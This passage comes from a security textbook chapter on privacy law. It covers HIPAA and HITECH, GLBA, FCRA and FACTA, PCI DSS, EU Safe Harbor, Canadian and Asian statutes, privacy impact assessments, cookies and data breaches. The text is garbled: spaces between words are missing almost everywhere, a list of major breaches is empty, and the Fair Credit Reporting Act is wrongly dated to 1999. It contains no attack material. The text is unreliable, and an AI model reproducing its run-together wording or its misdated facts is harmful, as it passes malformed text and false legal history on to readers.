HealthInsurancePortability&AccountabilityAct(HIPAA)Medicalandhealthinformationalsohasprivacyimplications,whichiswhytheU.S.CongressenactedtheHealthInsurancePortabilityandAccountabilityAct(HIPAA)of1996.HIPAAcallsforsweepingchangesinthewayhealthandmedicaldataisstored,exchanged,andused.Fromaprivacyperspective,significantrestrictionsofdatatransferstoensureprivacyareincludedinHIPAA,includingsecuritystandardsandelectronicsignatureprovisions.HIPAAsecuritystandardsmandateauniformlevelofprotectionsregardingallhealthinformationthatpertainstoanindividualandishousedortransmittedelectronically.Thestandardsmandatesafeguardsforphysicalstorage,maintenance,transmission,andaccesstoindividuals’healthinformation.HIPAAmandatesthatorganizationsthatuseelectronicsignatureshavetomeetstandardsensuringinformationintegrity,signerauthentication,andnonrepudiation.Thesestandardsleavetoindustrythetaskofspecifyingthetechnicalsolutionsandmandatecomplianceonlytosignificantlevelsofprotectionasprovidedbytherulesbeingreleasedbyindustry.
TechTip
ProtectedHealthInformation(PHI)HIPAAregulationsdefineProtectedHealthInformation(PHI)as“anyinformation,whether
oralorrecordedinanyformormedium”that“[i]screatedorreceivedbyahealthcareprovider,healthplan,publichealthauthority,
employer,lifeinsurer,schooloruniversity,orhealthcareclearinghouse”;and“[r]elatestothepast,present,orfuturephysicalormentalhealthorconditionofan
individual;theprovisionofhealthcaretoanindividual;orthepast,present,orfuturepaymentfortheprovisionofhealthcaretoanindividual.”
HIPAA’slanguageisbuiltupontheconceptsofProtectedHealthInformation(PHI)andNoticeofPrivacyPractices(NPP).HIPAAdescribes“coveredentities”includingmedicalfacilities,billingfacilities,andinsurance(third-partypayer)facilities.PatientsaretohaveaccesstotheirPHIandanexpectationofappropriateprivacyandsecurityassociatedwithmedicalrecords.HIPAAmandatesaseriesofadministrative,technical,andphysicalsecuritysafeguardsforinformation,includingelementssuchasstafftrainingandawareness,andspecificlevelsofsafeguardsforPHIwheninuse,stored,orintransitbetweenfacilities.
TryThis!NoticeofPrivacyPracticesVisityourlocaldoctor’soffice,hospital,orclinicandaskfortheirNoticeofPrivacyPractices(NPP).Thisnoticetopatientsdetailswhatinformationwillbecollectedandtheusesandsafeguardsthatareapplied.Thesecanbefairlylengthyanddetaileddocuments,andinmanycasesareinabookletform.
In2009,aspartoftheAmericanRecoveryandReinvestmentActof2009,theHealthInformationTechnologyforEconomicandClinicalHealthAct(HITECHAct)waspassedintolaw.AlthoughtheprimarypurposeoftheHITECHActwastoprovidestimulusmoneyfortheadoptionofelectronicmedicalrecords(EMR)systemsatalllevelsofthehealthcaresystem,italsocontainednewsecurityandprivacyprovisionstoaddteethtothosealreadyinHIPAA.HIPAAprotectionswereconfinedtothedirectmedicalprofession,anddidnotcoverentitiessuchashealthinformationexchangesandother“businessassociates”engagedinthecollectionanduseofPHI.UnderHITECH,businessassociateswillbe
requiredtoimplementthesamesecuritysafeguardsandrestrictionsonusesanddisclosures,toprotectindividuallyidentifiablehealthinformation,ascoveredentitiesunderHIPAA.Italsosubjectsbusinessassociatestothesamepotentialcivilandcriminalliabilityforbreachesascoveredentities.HITECHalsospecifiesthatU.S.DepartmentofHealth&HumanServices(HHS)isnowrequiredtoconductperiodicauditsofcoveredentitiesandbusinessassociates.
TechTip
HIPAAPenaltiesHIPAAcivilpenaltiesforwillfulneglectareincreasedundertheHITECHAct.Thesepenaltiescanextendupto$250,000,andrepeat/uncorrectedviolationscanextendupto$1.5million.UnderHIPAAandtheHITECHActanindividualcannotbringacauseofactionagainstaprovider.Thelawsspecifythatastateattorneygeneralcanbringanactiononbehalfofstateresidents.
Gramm-Leach-BlileyAct(GLBA)Inthefinancialarena,GLBAintroducedtheU.S.consumertoprivacynotices,requiringfirmstodisclosewhattheycollect,howtheyprotecttheinformation,andwithwhomtheywillshareit.Annualnoticesarerequiredaswellastheoptionforconsumerstooptoutofthedatasharing.TheprimaryconceptbehindU.S.privacylawsinthefinancialarenaisthatconsumersbeallowedtooptout.ThiswasstrengthenedinGLBAtoincludespecificwordingandnotificationsaswellasrequiringfirmstoappointmentaprivacyofficer.MostU.S.consumershavewitnessedtheresultsofGLBA,everyyearreceivingprivacynoticesfromtheirbanksandcreditcardcompanies.ThesenoticesareoneofthevisibleeffectsofGLBAonchangingtheroleofprivacyassociatedwithfinancialinformation.
CaliforniaSenateBill1386(SB1386)CaliforniaSenateBill1386(SB1386)wasalandmarklawconcerninginformationdisclosures.ItmandatesthatCaliforniansbenotifiedwheneverPIIislostordisclosed.SincethepassageofSB1386,numerousotherstateshavemodeledlegislationonthisbill,andalthoughnationallegislationhasbeenblockedbypoliticalproceduralmoves,itwilleventuallybepassed.ThecurrentlistofU.S.statesandterritoriesthatrequiredisclosurenoticesisupto49,withonlyAlabama,NewMexico,andSouthDakotawithoutbills.Eachofthesedisclosurenoticelawsisdifferent,makingthecaseforaunifyingfederalstatutecompelling,butcurrentlyitislowontheprioritylistsofmostpoliticians.
U.S.BankingRulesandRegulationsBankinghasalwayshadanelementofPIIassociatedwithit,fromwhohasdepositstowhohasloans.Asthescaleofoperationsincreased,bothinnumbersofcustomersandproducts,theimportanceofinformationforprocessinggrew.Checksbecameautilityinstrumenttoconveyinformationassociatedwithfundstransferbetweenparties.Asacheckwasbasicallyapromisetopay,intheformofdirectionstoabank,occasionallythecheckwasnothonoredandamerchanthadtotrackdownthepartytodemandpayment.Thus,itbecameindustrypracticetowriteadditionalinformationonachecktoassistafirminlatertrackingdownthedraftingparty.Thisinformationincludeditemssuchasaddress,workphonenumber,acreditcardnumber,andsoon.Thisledtotheco-locationofinformationaboutanindividual,andthisinformationwasusedattimestoperformacrimeofidentitytheft.Tocombatthisandpreventthegatheringofthistypeofinformation,aseriesofbankingandfinancialregulationswereissuedbytheU.S.governmenttoprohibitthisformofinformationcollection.Otherregulationsaddresseditemssuchascreditcardnumbersbeingprintedonreceipts,mandatingonlythelastfivedigitsbeexposed.
PaymentCardIndustryDataSecurityStandard(PCIDSS)AsdescribedinChapter24,themajorcreditcardfirms,suchasMasterCard,Visa,AmericanExpress,andDiscover,designedaprivate-sectorinitiativetodealwithprivacyissuesassociatedwithcreditcardtransactioninformation.PCIDSSisastandardthatprovidesguidanceonwhatelementsofacreditcardtransactionneedprotectionandthelevelofexpectedprotection.PCIDSSisnotalaw,butratheracontractualregulation,enforcedthroughaseriesoffinesandfeesassociatedwithperformingbusinessinthisspace.PCIDSSwasareactiontotwophenomena,datadisclosuresandidentitytheft.
FairCreditReportingAct(FCRA)TheFairCreditReportingActof1999broughtsignificantprivacyprotectionstotheconsumercreditreportingagencies(CRAs).Thisactrequiresthattheagenciesprovideconsumersnoticeoftheirrightsandresponsibilities.Theagenciesarerequiredtoperformtimelyinvestigationsoninaccuraciesreportedbyconsumers.TheagenciesarealsorequiredtonotifytheotherCRAswhenconsumerscloseaccounts.Theactalsohastechnicalissuesassociatedwithdataintegrity,datadestruction,dataretention,andconsumerandthird-partyaccesstodata.ThedetailsofFCRAprovedtobeinsufficientwithrespecttoseveralaspectsofidentitytheft,andin2003,theFairandAccurateCreditTransactionsActwaspassed,modifyingandexpandingontheprivacyandsecurityprovisionsofFCRA.
TechTip
FACTAandCreditCardReceiptsOneoftheprovisionsofFACTAcompelsbusinessestoprotectcreditcardinformationon
receipts.BeforeFACTA,itwascommonforreceiptstohaveentirecreditcardnumbers,aswellasadditionalinformation.Today,receiptscandisplayonlythelastfivedigitsofthecardnumberandcannotincludethecardexpirationdate.Theseruleswentintoeffectin2005andmerchantshadoneyeartocomply.
FairandAccurateCreditTransactionsAct(FACTA)TheFairandAccurateCreditTransactionsActof2003waspassedtoenactstrongerprotectionsforconsumerinformationfromidentitytheft,errors,andomissions.FACTAamendedportionsofFCRAtoimprovetheaccuracyofcustomerrecordsinconsumerreportingagencies,toimprovetimelyresolutionofconsumercomplaintsconcerninginaccuracies,andtomakebusinessestakereasonablestepstoprotectinformationthatcanleadtoidentitytheft.
TechTip
FTCDisposalRuleTheFTC’sDisposalRuleappliestoconsumerreportingagenciesaswellastoanyindividualsandbusinessesthatuseconsumerreports,suchaslenders,insurers,employers,andlandlords.
FACTAalsohadother“disposalrules”associatedwithconsumerinformation.FACTAmandatesthatinformationthatisnolongerneededmustbeproperlydisposedof,eitherbyburning,pulverizing,orshredding.Anyelectronicinformationmustbeirreversiblydestroyedorerased.Shouldthird-partyfirmsbeusedfordisposal,therulesstillpertaintotheoriginalcontractingparty,sothirdpartiesshouldbeselectedwithcareandmonitoredforcompliance.
TechTip
RedFlagRulesTheFTChasadoptedasetofredflagrulesthatareinvokedtoassistentitiesindeterminingwhenextraprecautionsmustbetakenconcerningPIIrecords.Thefollowingaresomeexamplesofredflagsthatshouldpromptanorganizationtoinitiateadditional,specificdata-handlingstepstoprotectdata:
Changeofaddressrequest.Thisisacommontoolforidentitythieves,andassuch,firmsshouldprovideprotectionstepstoverifychangeofaddressrequests.
Suddenuseofanaccountthathasbeeninactiveforalongtime,orradicalchangesinuseofanyaccount.
Asuspiciousaddressorphonenumber.Manyfraudulentaddressesandnumbersareknown,andrepeatedapplicationsshouldbequicklynotedandstopped.
Requestforcreditonaconsumeraccountthathasacreditfreezeonacreditreportingrecord.
AdditionalinformationisavailablefromtheFTCatwww.ftc.gov/tips-advice/business-center/guidance/fighting-identity-theft-red-flags-rule-how-guide-business.Wheneveraredflagissueoccurs,thebusinessmusthavespecialproceduresinplaceto
ensurethattheeventisnotfraudulent.Callingthecustomerandverifyinginformationbeforetakingactionisoneexampleofthistypeofadditionalaction.
Non-FederalPrivacyConcernsintheUnitedStates
Despitethewideassortmentoffederalstatutesassociatedwithprivacy,asignificantgapremainsinprivacyprotectionintheUnitedStates.Governmentinformationaboutitscitizensisnotlimitedtojustthefederalgovernment.Stateandlocalgovernmentsalsohavesignificantinformationholdingsassociatedwithindividuals.Infact,itisnotuncommonforthequantityanddetailofinformationtoincreaseasproximitytoindividualsincreases.Localgovernmentshavesignificantquantitiesofgovernment-compiledpersonalinformation(suchaspropertyownership,courtrecords,voterregistration,fictitiousbusinessnames,vitalrecords,andsoforth).
Onlyabouthalfthestateshavesimilarprivacyactsconcerningstategovernmentagencies’handlingofpersonalinformation.InCalifornia,thisstatuteistheInformationPracticesAct.Eachstatethathassuchprotectionprovisionsdoessounderitsownsetofrulesandregulations,creatingapatchworkapproachtothistopic.Inonlyahandfulofstatesdoesthestate’s“privacyact”extendtolocalgovernment,where,asalreadynoted,existsthelion’sshareofinformation.ThislackofunifiedtreatmenthasplacedtheUnitedStatesbehindmanyothernationswithrespecttothisissueandhascreatedsafeharborissuesthatregularlyrequiretimeandefforttoaddressatthehighestlevelsofgovernment,withadifferingsetofofficialsinvolveddependinguponthesourceoftheinformation.Safeharborrulesareaseriesofagreementstoprivacyhandlingacrossinternationalboundaries.Forexample,ifprivacyconcernsarisefromtravelissues,theDepartmentofHomelandSecuritywouldrespond;forfinancialtransactionprivacyissues,itwouldbetheTreasuryDepartment;andforexportandimport,itwouldbetheCommerceDepartment.Thischannel-dependentresponsibilitycomplicatesnegotiationsoverissuesastheU.S.governmentagencyresponsibleforprivacyisalwayschangingasthesourceoftheprivacyissuechanges.
InternationalPrivacyLawsPrivacyisnotaU.S.-centricphenomenon,butitdoeshavestrongculturalbiases.Legalprotectionsforprivacytendtofollowthesocio-culturalnormsbygeography;hence,therearedifferentpoliciesinEuropeannationsthanintheUnitedStates.IntheUnitedStates,theprimarypathtoprivacyisviaopt-out,whereasinEuropeandothercountries,itisviaopt-in.Whatthismeansisthatthefundamentalnatureofcontrolshifts.IntheU.S.,aconsumermustnotifyafirmthattheywishtoblockthesharingofpersonalinformation;otherwisethefirmhaspermissionbydefault.IntheEU,sharingisblockedunlessthecustomerspecificallyoptsintoallowit.TheFarEasthassignificantlydifferentculturalnormswithrespecttoindividualismvs.collectivism,andthisisseenintheirprivacylawsas
well.Evenincountrieswithcommonborders,distinctdifferencesexist,suchastheUnitedStatesandCanada;CanadianlawsandcustomshavestrongrootstotheirUKhistory,andinmanycasesfollowEuropeanidealsasopposedtoU.S.ones.OneoftheprimarysourcesofintellectualandpoliticalthoughtonprivacyhasbeentheOrganizationforEconomicCo-operationandDevelopment(OECD).Thismultinationalentityhasfordecadesconductedmultilateraldiscussionsandpolicyformationonawiderangeoftopics,includingprivacy.
OECDFairInformationPracticesOECDFairInformationPracticesarethefoundationalelementformanyworldwideprivacypractices.Datingto1980,FairInformationPracticesareasetofprinciplesandpracticesthatsetouthowaninformation-basedsocietymayapproachinformationhandling,storage,management,andflowswithaviewtowardmaintainingfairness,privacy,andsecurity.MembersoftheOECDrecognizedthatinformationwasacriticalresourceinarapidlyevolvingglobaltechnologyenvironment,andthatproperhandlingofthisresourcewascriticalforlong-termsustainabilityofgrowth.
TechTip
OECD’sPrivacyCodeOECD’sprivacycodewasdevelopedtohelp“harmonisenationalprivacylegislationand,whileupholdingsuchhumanrights,[to]atthesametimepreventinterruptionsininternationalflowsofdata.[TheGuidelines]representaconsensusonbasicprincipleswhichcanbebuiltintoexistingnationallegislation,orserveasabasisforlegislationinthosecountrieswhichdonotyethaveit.”(Source:“OECDGuidelinesontheProtectionofPrivacyandTransborderFlowsofPersonalData,”www.oecd.org/sti/ieconomy/oecdguidelinesontheprotectionofprivacyandtransborderflowsofpersonaldata.htm
EuropeanLaws
TheEUhasdevelopedacomprehensiveconceptofprivacy,whichisadministeredviaasetofstatutesknownasdataprotection.Theseprivacystatutescoverallpersonaldata,whethercollectedandusedbygovernmentorbyprivatefirms.Theselawsareadministeredbystateandnationaldataprotectionagenciesineachcountry.WiththeadventoftheEU,thiscommoncomprehensivenessstandsindistinctcontrasttothepatchworkoflawsintheUnitedStates.PrivacylawsinEuropearebuiltaroundtheconceptthatprivacyisa
fundamentalhumanrightthatdemandsprotectionthroughgovernmentadministration.WhentheEUwasformed,manylawswereharmonizedacrosstheoriginal15membernations,anddataprivacywasamongthosestandardized.OneimportantaspectofthisharmonizationistheDataProtectionDirective,adoptedbyEUmembers,whichhasaprovisionallowingtheEuropeanCommissiontoblocktransfersofpersonaldatatoanycountryoutsidetheEUthathasbeendeterminedtolackadequatedataprotectionpolicies.TheimpetusfortheEUdirectiveistoestablishtheregulatoryframeworktoenablethemovementofpersonaldatafromonecountrytoanother,whileatthesametimeensuringthatprivacyprotectionis“adequate”inthecountrytowhichthedataissent.ThiscanbeseenasadirectresultofearlyHEWtaskforce(see“U.S.PrivacyLaws,”earlierinthechapter)andOECDdirections.Iftherecipientcountryhasnotestablishedaminimumstandardofdataprotection,itisexpectedthatthetransferofdatawillbeprohibited.
TechTip
SafeHarborPrinciplesSafeHarborisbuiltuponsevenprinciples:
NoticeAfirmmustgivenoticeofwhatisbeingcollected,howitwillbeused,andwithwhomitwillbeshared.
ChoiceAfirmmustallowtheoptiontooptoutoftransferofPIItothirdparties.
OnwardTransferAlldisclosuresofPIImustbeconsistentwiththepreviousprinciples
ofNoticeandChoice.SecurityPIImustbesecuredatalltimes.DataIntegrityPIImustbemaintainedaccuratelyand,ifincorrect,thecustomerhastherighttocorrectit.
AccessIndividualsmusthaveappropriateandreasonableaccesstoPIIforthepurposesofverificationandcorrection.
EnforcementIssueswithprivacyandPIImusthaveappropriateenforcementprovisionstoremaineffective.
Seewww.export.gov/safeharbor/eg_main_018236.aspformoreinformation.
ThedifferencesinapproachbetweentheU.S.andtheEUwithrespecttodataprotectionledtheEUtoissueexpressionsofconcernabouttheadequacyofdataprotectionintheUnitedStates,amovethatcouldhavepavedthewaytotheblockingofdatatransfers.Afternegotiation,itwasdeterminedthatU.S.organizationsthatvoluntarilyjoinedanarrangementknownasSafeHarborwouldbeconsideredadequateintermsofdataprotection.SafeHarborisamechanismforself-regulationthatcanbeenforcedthroughtradepracticelawviatheFTC.AbusinessjoiningtheSafeHarborConsortiummustmakecommitmentstoabidebyspecificguidelinesconcerningprivacy.SafeHarbormembersalsoagreetobegovernedbycertainself-enforcedregulatorymechanisms,backedultimatelybyFTCaction.
TechTip
EncryptionandPrivacyEncryptionhaslongbeenheldbygovernmentstobeatechnologyassociatedwiththemilitary.Assuch,differentgovernmentshaveregulateditindifferentmanners.TheU.S.governmenthasgreatlyreducedcontrolsoverencryptioninthepastdecade.Othercountries,suchasGreatBritain,haveenactedstatutesthatcompeluserstoturnoverencryptionkeyswhenaskedbyauthorities.CountriessuchasFrance,Malaysia,andChinastilltightlycontrolandlicenseend-useruseofencryptiontechnologies.TheprimarydriverforPhilZimmermantocreatePrettyGoodPrivacy(PGP)wastheneedforprivacyincountrieswherethegovernmentwasconsideredathreattocivilliberties.
AnothermajordifferencebetweenU.S.andEuropeanregulationliesinwheretherightofcontrolisexercised.InEuropeandirectives,therightofcontroloverprivacyisbalancedinsuchawayastofavorconsumers.Ratherthanhavingtopaytooptout,aswithunlistedphonenumbersintheUnitedStates,consumershavesuchservicesforfree.Ratherthanhavingtooptoutatall,thedefaultprivacysettingisdeemedtobethehighestlevelofdataprivacy,andusershavetooptintoshareinformation.ThisdefaultsettingisacornerstoneoftheEuropeanUnion’sDirectiveonProtectionofPersonalDataandisenforcedthroughnationallawsinallmembernations.
CanadianLawsLikemanyEuropeancountries,Canadahasacentralizedformofprivacylegislationthatappliestoeveryorganizationthatcollects,uses,ordisclosespersonalinformation,includinginformationaboutemployees.TheseregulationsstemfromthePersonalInformationProtectionandElectronicDataAct(PIPEDA),whichrequiresthatpersonalinformationbecollectedandusedonlyforappropriatepurposes.Individualsmustbenotifiedastowhytheinformationisrequestedandhowitwillbeused.Theacthassafeguardsassociatedwithstorage,use,reuse,andretention.Toensureleadershipinthefieldofprivacyissues,Canadahasa
national-levelprivacycommissionerandeachprovincehasaprovince-levelprivacycommissioner.ThesecommissionersactasadvocatesonbehalfofindividualsandhaveusedlegalactionstoenforcetheprivacyprovisionsassociatedwithPIPEDAtoprotectpersonalinformation.
AsianLawsJapanhasaPersonalInformationProtectionLawthatrequiresprotectionofpersonalinformationusedbytheJapanesegovernment,thirdparties,andthepublicsector.TheJapaneselawhasprovisionswherethe
governmententitymustspecifythepurposeforwhichinformationisbeingcollected,specifythesafeguardsapplied,and,whenpermitted,discontinueuseoftheinformationuponrequest.HongKonghasanofficeofthePrivacyCommissionerforPersonal
Data(PCPD),astatutorybodyentrustedwiththetaskofprotectingpersonaldataprivacyofindividualsandtoensurecomplianceswiththePersonalData(Privacy)OrdinanceinHongKong.OnemaintaskoftheCommissionerispubliceducation,creatinggreaterawarenessofprivacyissuesandtheneedtocomplywiththePersonalDataOrdinance.Chinahashadalongreputationofpoorprivacypractices.Someofthis
comesfromtheculturalbiastowardcollectivism,andsomecomesfromthelong-standinggovernmenttraditionofsurveillance.RecentnewsoftheChinesegovernmenteavesdroppingonSkypeandotherInternet-relatedcommunicationshasheightenedthisconcern.China’sconstitutionhasprovisionsforprivacyprotectionsforthecitizens.Evenso,issueshavecomeintheareaofenforcementandpenalties,andprivacyitemsthathavebeenfarfromuniformintheirjudicialhistory.
Privacy-EnhancingTechnologiesOneprincipalconnectionbetweeninformationsecurityandprivacyisthatwithoutinformationsecurity,youcannothaveprivacy.Ifprivacyisdefinedastheabilitytocontrolinformationaboutoneself,thentheaspectsofconfidentiality,integrity,andavailabilityfrominformationsecuritybecomecriticalelementsofprivacy.Justastechnologyhasenabledmanyprivacy-impactingissues,technologyalsooffersthemeansinmanycasestoprotectprivacy.Anapplicationortoolthatassistsinsuchprotectioniscalledaprivacy-enhancingtechnology(PET).EncryptionisatthetopofthelistofPETsforprotectingprivacyand
anonymity.Asnotedearlier,oneofthedrivingfactorsbehindPhilZimmerman’sinventionofPGPwasthedesiretoenablepeoplelivinginrepressiveculturestocommunicatesafelyandfreely.Encryptioncankeepsecretssecret,andisaprimechoiceforprotectinginformationatanystage
initslifecycle.ThedevelopmentofTorroutingtopermitanonymouscommunicationscoupledwithhigh-assurance,low-costcryptographyhasmademanywebinteractionssecurableandsafefromeavesdropping.OtherPETsincludesmallapplicationprograms,calledcookiecutters,
thataredesignedtopreventthetransferofcookiesbetweenbrowsersandwebservers.Somecookiecuttersblockallcookies,whileotherscanbeconfiguredtoselectivelyblockcertaincookies.SomecookiecuttersalsoblockthesendingofHTTPheadersthatmayrevealpersonalinformationbutmaynotbenecessarytoaccessawebsite,andsomeblockbannerads,pop-upwindows,animatedgraphics,orotherunwantedwebelements.SomerelatedPETtoolsaredesignedspecificallytolookforinvisibleimagesthatsetcookies(calledwebbeaconsorwebbugs).OtherPETsareavailabletoPCusers,includingencryptionprogramsthatallowuserstoencryptandprotecttheirowndata,evenonUSBkeys.
PrivacyPoliciesOneofthedirectoutcomesofthelegalstatutesassociatedwithprivacyhasbeenthedevelopmentofaneedforcorporateprivacypoliciesassociatedwithdatacollection.Withamyriadofgovernmentagenciesinvolved,eachwithaspecificmandateto“assist”intheprotectioneffortassociatedwithPII,onecanask,whatisthebestpathforanindustrymember?IfyourorganizationneedsPIItoperformitstasks,obtainingandusingitisfineinmostcases,butyoumustensurethateveryoneintheorganizationcomplieswiththeacts,rules,andregulationsassociatedwiththesegovernmentagencies.Policiesandproceduresarethebestwaytoensureuniformcomplianceacrossanorganization.Thedevelopmentofaprivacypolicyisanessentialfoundationalelementofacompany’sprivacystance.
TechTip
PrivacyComplianceStepsToensurethatanorganizationcomplieswiththenumerousprivacyrequirementsandregulations,astructuredapproachtoprivacyplanningandpoliciesisrecommended:
1.Identifytheroleintheorganizationthatwillberesponsibleforcomplianceandoversight.
2.Documentallapplicablelawsandregulations,industrystandards,andcontractrequirements.
3.Identifyanyindustrybestpractices.
4.Performaprivacyimpactassessment(PIA)andariskassessment.5.Maptheidentifiedriskstocompliancerequirements.
6.Createaunifiedriskmitigationplan.
PrivacyImpactAssessmentAprivacyimpactassessment(PIA)isastructuredapproachtodeterminingthegapbetweendesiredprivacyperformanceandactualprivacyperformance.APIAisananalysisofhowPIIishandledthroughbusinessprocessesandanassessmentofriskstothePIIduringstorage,use,andcommunication.APIAprovidesameanstoassesstheeffectivenessofaprocessrelativetocompliancerequirementsandidentifyissuesthatneedtobeaddressed.APIAisstructuredwithaseriesofdefinedstepstoensureacomprehensivereviewofprivacyprovisions.Thefollowingstepscompriseahigh-levelmethodologyandapproach
forconductingaPIA:
1.EstablishPIAscope.Determinethedepartmentsinvolvedandtheappropriaterepresentatives.Determinewhichapplicationsandbusinessprocessesneedtobeassessed.Determineapplicablelawsandregulationsassociatedwiththebusinessandprivacyconcerns.
2.Identifykeystakeholders.IdentifyallbusinessunitsthatusePII.ExaminestafffunctionssuchasHR,Legal,IT,Purchasing,andQualityControl.
3.DocumentallcontactwithPII:PIIcollection,access,use,sharing,disposal
Processesandprocedures,policies,safeguards,data-flowdiagrams,andanyotherriskassessmentdata
Websitepolicies,contracts,HR,andadministrativeforotherPII
4.Reviewlegalandregulatoryrequirements,includinganyupstreamcontracts.Thesourcesaremany,butsomecommonlyoverlookedissuesareagreementswithsuppliersandcustomersoverinformationsharingrights.
5.Documentgapsandpotentialissuesbetweenrequirementsandpractices.Allgapsandissuesshouldbemappedagainstwheretheissuewasdiscoveredandthebasis(requirementorregulation)thatthegapmapsto.
6.Reviewfindingswithkeystakeholderstodetermineaccuracyandclarifyanyissues.Beforethefinalreportiswritten,anyissuesorpossiblemiscommunicationsshouldbeclarifiedwiththeappropriatestakeholderstoensureafairandaccuratereport.
7.Createfinalreportformanagement.
WebPrivacyIssuesTheInternetactsasalargeinformation-sharingdomain,andassuchcanbeaconduitforthetransferenceofinformationamongmanyparties.TheWeboffersmuchintheformofcommunicationbetweenmachines,people,andsystems,andthissameexchangeofinformationcanbeassociatedwithprivacybasedonthecontentoftheinformationandthereasonfortheexchange.
Cookies
Cookiesaresmallbitsoftextthatarestoredonauser’smachineandsenttospecificwebsiteswhentheuservisits.Cookiescanstoremanydifferentthings,fromtokensthatprovideareferencetoadatabaseserverbehindthewebservertoassistinmaintainingstatethroughanapplication,tothecontentsofashoppingcart.Cookiescanalsoholddatadirectly,inwhichcasetherearepossibleprivacyimplications.Whenacookieholdsatokennumberthatismeaninglesstooutsidersbutmeaningfultoaback-endserver,thenthelossofthecookierepresentsnolossatall.Whenthecookietextcontainsmeaningfulinformation,thenthelosscanresultinprivacyissues.Forinstance,whenacookiecontainsalongnumberthathasnomeaningexcepttothedatabaseserver,thenthenumberhasnoPII.Butifthecookiecontainstext,suchasaship-toaddressforanorder,thiscanrepresentPIIandcanresultinaprivacyviolation.Itiscommontoencodethedataincookies,butBase64encodingisnotencryptionandcanbedecodedbyanyone,thusprovidingnoconfidentiality.Cookiesprovideausefulserviceofallowingstatetobemaintainedina
statelessprocess,webserving(see“Cookies”inChapter17).ButbecauseofthepotentialforPIIleakage,manyusershaveswornoffcookies.Thisleadstoissuesonnumerouswebsites,forwhenproperlyimplemented,theyposenoprivacydangerandcangreatlyenhancewebsiteusefulness.Thebottomlineforcookiesisfairlyeasy—donecorrectly,theydonot
representasecurityorprivacyissue.Doneincorrectly,theycanbeadisaster.Asimplerulesolvesmostproblemswithcookies:neverstoredatadirectlyonacookie;instead,storeareferencetoanotherwebapplicationthatpermitsthecorrectactionstooccurbasedonthekeyvalue.
PrivacyinPracticeWithprivacybeingdefinedasthepowertocontrolwhatothersknowaboutyouandwhattheycandowiththatinformation,thereremainsthequestionofwhatyoucandotoexercisethatcontrol.Informationisneededtoobtainservices,andinmanycasestheinformationisreused,oftenforadditionalandsecondarypurposes.Usersagreetotheseusesthrough
acceptanceofafirm’sprivacypolicy.Sharedinformationstillrequirescontrol,andinthiscasethecontrol
functionhasshiftedtothepartythatobtainedtheinformation.Theymaystoreitforfutureuse,forrecordpurposes,orforotheruses.Iftheyfailtoadequatelyprotecttheinformationfromlossordisclosure,thentheownernolongerhasauthorizedtheusesitmaybeemployedin.Datadisclosuresandinformationtheftsbothresultinunauthorizeduseofinformation.Userscantakeactionstobothprotecttheirinformationandtomitigateriskfromunauthorizedsharinganduseoftheirinformation.
UserActionsUsershavetoshareinformationforavarietyoflegitimatepurposes.Informationhasvalue,bothtotheauthorizeduserandtothosewhowouldstealtheinformationanduseitforunauthorizedpurposes.Ifusersaregoingtocontroltheirinformation,theyhavetotakecertainprecautions.Thisiswheresecurityandprivacyintersectatanoperationallevel.Securityfunctionalityenablescontrolandthusenablesprivacyfunctionality.Oneaspectofmaintainingcontroloverinformationisintheproper
securityprecautionspresentedthroughoutthebook,sotheywillnotberepeatedhere.Asecondlevelofactionscanbeemployedbyuserstomaintainknowledgeovertheirinformationuses.Thevalueofinformationisinitsuse,andinmanycases,thisusecanbetracked.Thetwomaintypesofinformationthathaveimmediatevaluearefinancialandmedical.Financialinformation,suchascreditcardinformation,identityinformation,andbankinginformation,canbeusedbycriminalstostealfromothers.Manytimestheuseofidentityorfinancialinformationwillshowuponthesystemsofrecordassociatedwiththeinformation.Thisiswhyitisimportanttoactuallyreadbankstatementsandverifycharges.
Usersshouldperiodically,asinannually,requestcopiesoftheircreditbureaureportsandexaminethemforunauthorizedactivity.Likewise,usersshouldperiodicallyverifywiththeirhealthcareinsurers,lookingforunauthorizedactivitythereaswell.Thesechecksdonottakemuchtimeandprovideameanstopreventlong-termpenetrationofidentities.
Inthesamevein,oneshouldperiodicallyexaminetheircreditreport,lookingforunauthorizedcreditrequestsoraccounts.Periodicchecksofhealthcareinsuranceaccountsandreportsisessentialforthesamereason.Justbecauseyouhavepaidallyourcopays,youshouldn’tshredunopenedenvelopesfromtheinsurancecompany.Ifsomeoneelseisusingyourinformation,youmaybeauthorizingtheiruseofyourstoleninformationbynotalertingtheinsurancecompanytothemisuse.
DataBreachesWhenacompanylosesdatathatithasstoredonitsnetwork,thetermisadatabreach.Databreacheshavebecomeanalmostdailynewsitem,withpeopleactuallybecomingdesensitizedtotheiroccurrence.Databreachesactasmeansofnotificationthatsecurityeffortshavefailed.Verizonregularlypublishesadatabreachinvestigationreport,examiningtherootcausesbehindhundredsofbreachevents.Inthe2014report,Verizonfoundthatnineoutoftenbreachescanbedescribedbythefollowingninedistinctpatterns:
Point-of-sale(POS)intrusions
Webappattacks
Insiderandprivilegemisuse
Physicaltheftandloss
Miscellaneouserrors(misdelivery,misconfiguration,usererrors)
Crimeware
Paymentcardskimmers
Denialofservice
Cyberespionage
In2014,over63,000securityincidentswereanalyzed,with1367confirmeddatabreachesacross95countries.
2014andinto2015wasabannertimefordatabreaches.Themajorbreachesinclude:
OthermajorincidentsincludetheKoreanCreditBureaubreach,involving20millionrecordsinacountryof50millionpeople.PossiblythebiggestnewswasthethirdbreachofSony,thistimenotjustthePlayStationnetwork,butvirtuallyallcorporaterecordsassociatedwithSonyPicturesEntertainment,thefilmstudiosubsidiary.Embarrassinge-mails,PIIforemployees,scripts…thecontentreleasedwaswidespread,includingthatoncontractormachines.
Chapter25Review
ForMoreInformationRebeccaHerold,PrivacyProfessor
MonthlyPrivacyProfessorTipswww.privacyguidance.com/eTips.html
Blogwww.privacyguidance.com/blog/Videoswww.privacyguidance.com/eMy_Videos.html
DataBreaches
InformationisBeautiful(visualizations)www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/
VerizonDataBreachInvestigationsReportwww.verizonenterprise.com/DBIR
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaspectsofprivacy.
Defineprivacy
Privacyisthepowertocontrolwhatothersknowaboutyouandwhattheycandowiththatinformation.
Theconceptofprivacydoesnottranslatedirectlytoinformationaboutabusinessasitisnotaboutaperson.
Identifyprivacylawsrelativetocomputersecurityinvariousindustries
NumerousU.S.federalstatuteshaveprivacyprovisions,includingFERPA,VPPA,GLBA,HIPAA,andsoon.
Thenumberofstateandlocallawsthataddressprivacyissuesislimited.
Awidearrayofinternationallawsaddressprivacyissues,includingthoseoftheEU,Canada,andothernations.
